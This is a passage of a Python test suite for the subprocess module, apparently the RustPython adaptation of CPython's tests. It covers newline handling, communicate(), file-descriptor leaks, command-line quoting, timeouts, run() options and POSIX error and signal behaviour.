'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
# TODO: RUSTPYTHON
if sys.platform == "win32":
test_universal_newlines_communicate = unittest.expectedFailure(test_universal_newlines_communicate)
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
# Python debug builds push something like "[42442 refs]\n"
# to stderr at exit of subprocess.
# Don't use assertStderrEqual because it strips CR and LF from output.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
# TODO: RUSTPYTHON
if sys.platform == "win32":
test_universal_newlines_communicate_stdin_stdout_stderr = unittest.expectedFailure(test_universal_newlines_communicate_stdin_stdout_stderr)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with BOM and
# without, and UTF-16 and UTF-32.
for encoding in ['utf-16', 'utf-32-be']:
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding=encoding)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '1\n2\n3\n4')
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_communicate_errors(self):
for errors, expected in [
('ignore', ''),
('replace', '\ufffd\ufffd'),
('surrogateescape', '\udc80\udc80'),
('backslashreplace', '\\x80\\x80'),
]:
code = ("import sys; "
r"sys.stdout.buffer.write(b'[\x80\x80]')")
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding='utf-8',
errors=errors)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '[{}]'.format(expected))
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, support.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen(ZERO_RETURN_CMD)
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
# Some heavily loaded buildbots (sparc Debian 3.x) require this much
# time to start.
self.assertEqual(p.wait(timeout=3), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen(ZERO_RETURN_CMD, "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen(ZERO_RETURN_CMD, None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen(ZERO_RETURN_CMD, bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
with support.SuppressCrashReport():
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
# TODO: RUSTPYTHON
if sys.platform == "win32":
test_bufsize_equal_one_text_mode = unittest.expectedFailure(test_bufsize_equal_one_text_mode)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
# we should get empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
with self.assertWarnsRegex(RuntimeWarning, 'line buffering'):
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(NONEXISTING_ERRORS):
subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# TODO: RUSTPYTHON
if sys.platform != "win32":
test_leaking_fds_on_error = unittest.expectedFailure(test_leaking_fds_on_error)
def test_nonexisting_with_pipes(self):
# bpo-30121: Popen with pipes must close properly pipes on error.
# Previously, os.close() was called with a Windows handle which is not
# a valid file descriptor.
#
# Run the test in a subprocess to control how the CRT reports errors
# and to get stderr content.
try:
import msvcrt
msvcrt.CrtSetReportMode
except (AttributeError, ImportError):
self.skipTest("need msvcrt.CrtSetReportMode")
code = textwrap.dedent(f"""
import msvcrt
import subprocess
cmd = {NONEXISTING_CMD!r}
for report_type in [msvcrt.CRT_WARN,
msvcrt.CRT_ERROR,
msvcrt.CRT_ASSERT]:
msvcrt.CrtSetReportMode(report_type, msvcrt.CRTDBG_MODE_FILE)
msvcrt.CrtSetReportFile(report_type, msvcrt.CRTDBG_FILE_STDERR)
try:
subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except OSError:
pass
""")
cmd = [sys.executable, "-c", code]
proc = subprocess.Popen(cmd,
stderr=subprocess.PIPE,
universal_newlines=True)
with proc:
stderr = proc.communicate()[1]
self.assertEqual(stderr, "")
self.assertEqual(proc.returncode, 0)
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(NONEXISTING_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing sensitive test, the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=20)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could
# be set by the wrong thread that doesn't actually have it
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = tempfile.mkstemp()
ofhandle, ofname = tempfile.mkstemp()
efhandle, efname = tempfile.mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
# TODO: RUSTPYTHON
@unittest.expectedFailure
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
ZERO_RETURN_CMD, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
# TODO: RUSTPYTHON
@unittest.expectedFailure
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_includes_filename(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.call(['/opt/nonexistent_binary', 'with', 'some', 'args'])
self.assertEqual(c.exception.filename, '/opt/nonexistent_binary')
# TODO: RUSTPYTHON
@unittest.expectedFailure
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_with_bad_cwd(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.Popen(['exit', '0'], cwd='/some/nonexistent/directory')
self.assertEqual(c.exception.filename, '/some/nonexistent/directory')
class RunFuncTestCase(BaseTestCase):
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# run() function with sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError):
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c:
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = subprocess.run(ZERO_RETURN_CMD, check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_input_arg(self):
        # run() can be called with input set to bytes
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
output = self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
cp = self.run_python((
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
def test_run_with_pathlike_path(self):
# bpo-31961: test run(pathlike_object)
        # the name of a command that can be run without
        # any arguments and exits quickly
prog = 'tree.com' if mswindows else 'ls'
path = shutil.which(prog)
if path is None:
self.skipTest(f'{prog} required for this test')
path = FakePath(path)
res = subprocess.run(path, stdout=subprocess.DEVNULL)
self.assertEqual(res.returncode, 0)
with self.assertRaises(TypeError):
subprocess.run(path, stdout=subprocess.DEVNULL, shell=True)
def test_run_with_bytes_path_and_arguments(self):
# bpo-31961: test run([bytes_object, b'additional arguments'])
path = os.fsencode(sys.executable)
args = [path, '-c', b'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_run_with_pathlike_path_and_arguments(self):
# bpo-31961: test run([pathlike_object, 'additional arguments'])
path = FakePath(sys.executable)
args = [path, '-c', 'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_capture_output(self):
cp = self.run_python(("import sys;"
"sys.stdout.write('BDFL'); "
"sys.stderr.write('FLUFL')"),
capture_output=True)
self.assertIn(b'BDFL', cp.stdout)
self.assertIn(b'FLUFL', cp.stderr)
def test_stdout_with_capture_output_arg(self):
# run() refuses to accept 'stdout' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stdout and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stdout=tf)
self.assertIn('stdout', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
def test_stderr_with_capture_output_arg(self):
# run() refuses to accept 'stderr' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stderr and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stderr=tf)
self.assertIn('stderr', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
    # This test _might_ wind up a bit fragile on loaded build+test machines,
    # as it depends on timing. The margins are wide enough for normal
    # situations, and it asserts that the timeout happened "soon enough" to
    # believe the right thing happened.
@unittest.skipIf(mswindows, "requires posix like 'sleep' shell command")
def test_run_with_shell_timeout_and_capture_output(self):
"""Output capturing after a timeout mustn't hang forever on open filehandles."""
before_secs = time.monotonic()
try:
subprocess.run('sleep 3', shell=True, timeout=0.1,
capture_output=True) # New session unspecified.
except subprocess.TimeoutExpired as exc:
after_secs = time.monotonic()
stacks = traceback.format_exc() # assertRaises doesn't give this.
else:
self.fail("TimeoutExpired not raised.")
self.assertLess(after_secs - before_secs, 1.5,
msg="TimeoutExpired was delayed! Bad traceback:\n```\n"
f"{stacks}```")
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
            # This avoids hard coding the errno value or the OS perror()
            # string and instead captures the exception that we want to see
            # below for comparison.
desired_exception = e
else:
self.fail("chdir to nonexistent directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
    # We mock the __del__ method for Popen in the next two tests
    # because it does cleanup based on the pid returned by fork_exec,
    # along with issuing a resource warning if it still exists. Since
    # we don't actually spawn a process in these tests, we can forgo
    # the destructor. An alternative would be to set _child_created to
    # False before the destructor is called, but there is no easy way
    # to do that.
class PopenNoDestructor(subprocess.Popen):
def __del__(self):
pass
# TODO: RUSTPYTHON
@unittest.expectedFailure
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_normal(self, fork_exec):
"""Test error passing done through errpipe_write in the good case"""
def proper_error(*args):
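            # The test assumes the mocked fork_exec() gets errpipe_write as
            # its 14th positional argument (index 13).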
errpipe_write = args[13]
# Write the hex for the error code EISDIR: 'is a directory'
err_code = '{:x}'.format(errno.EISDIR).encode()
os.write(errpipe_write, b"OSError:" + err_code + b":")
return 0
fork_exec.side_effect = proper_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(IsADirectoryError):
self.PopenNoDestructor(["non_existent_command"])
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_bad_data(self, fork_exec):
"""Test error passing done through errpipe_write where its not
in the expected format"""
error_data = b"\xFF\x00\xDE\xAD"
def bad_error(*args):
errpipe_write = args[13]
            # Anything can be in the pipe; no assumptions should
            # be made about its encoding, so we write some
            # arbitrary bytes to test it out.
os.write(errpipe_write, error_data)
return 0
fork_exec.side_effect = bad_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(subprocess.SubprocessError) as e:
self.PopenNoDestructor(["non_existent_command"])
self.assertIn(repr(error_data), str(e.exception))
# TODO: RUSTPYTHON
@unittest.expectedFailure
@unittest.skipIf(not os.path.exists('/proc/self/status'),
"need /proc/self/status")
def test_restore_signals(self):
# Blindly assume that cat exists on systems with /proc/self/status...
default_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=False)
for line in default_proc_status.splitlines():
if line.startswith(b'SigIgn'):
default_sig_ign_mask = line
break
else:
self.skipTest("SigIgn not found in /proc/self/status.")
restored_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=True)
for line in restored_proc_status.splitlines():
if line.startswith(b'SigIgn'):
restored_sig_ign_mask = line
break
self.assertNotEqual(default_sig_ign_mask, restored_sig_ign_mask,
msg="restore_signals=True should've unblocked "
"SIGPIPE and friends.")
def test_start_new_session(self):
        # For code coverage of calling setsid(). We don't care if we get an
        # EPERM error from it depending on the test execution environment;
        # that still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c", "import os; print(os.getsid(0))"],
start_new_session=True)
except OSError as e:
if e.errno != errno.EPERM:
raise
else:
parent_sid = os.getsid(0)
child_sid = int(output)
self.assertNotEqual(parent_sid, child_sid)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_CalledProcessError_str_signal(self):
err = subprocess.CalledProcessError(-int(signal.SIGABRT), "fake cmd")
error_string = str(err)
        # We're relying on the repr() of the signal.Signals IntEnum to provide
        # the word "signal", the signal name, and the numeric value.
self.assertIn("signal", error_string.lower())
# We're not being specific about the signal name as some signals have
# multiple names and which name is revealed can vary.
self.assertIn("SIG", error_string)
self.assertIn(str(signal.SIGABRT), error_string)
def test_CalledProcessError_str_unknown_signal(self):
err = subprocess.CalledProcessError(-9876543, "fake cmd")
error_string = str(err)
self.assertIn("unknown signal 9876543.", error_string)
def test_CalledProcessError_str_non_zero(self):
err = subprocess.CalledProcessError(2, "fake cmd")
error_string = str(err)
self.assertIn("non-zero exit status 2.", error_string)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
with p:
self.assertEqual(p.stdout.read(), b"apple")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
self.assertTrue(
subprocess._posixsubprocess,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
# TODO: RUSTPYTHON
@unittest.expectedFailure
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
def raise_runtime_error():
raise RuntimeError("this shouldn't escape")
enabled = gc.isenabled()
orig_gc_disable = gc.disable
orig_gc_isenabled = gc.isenabled
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
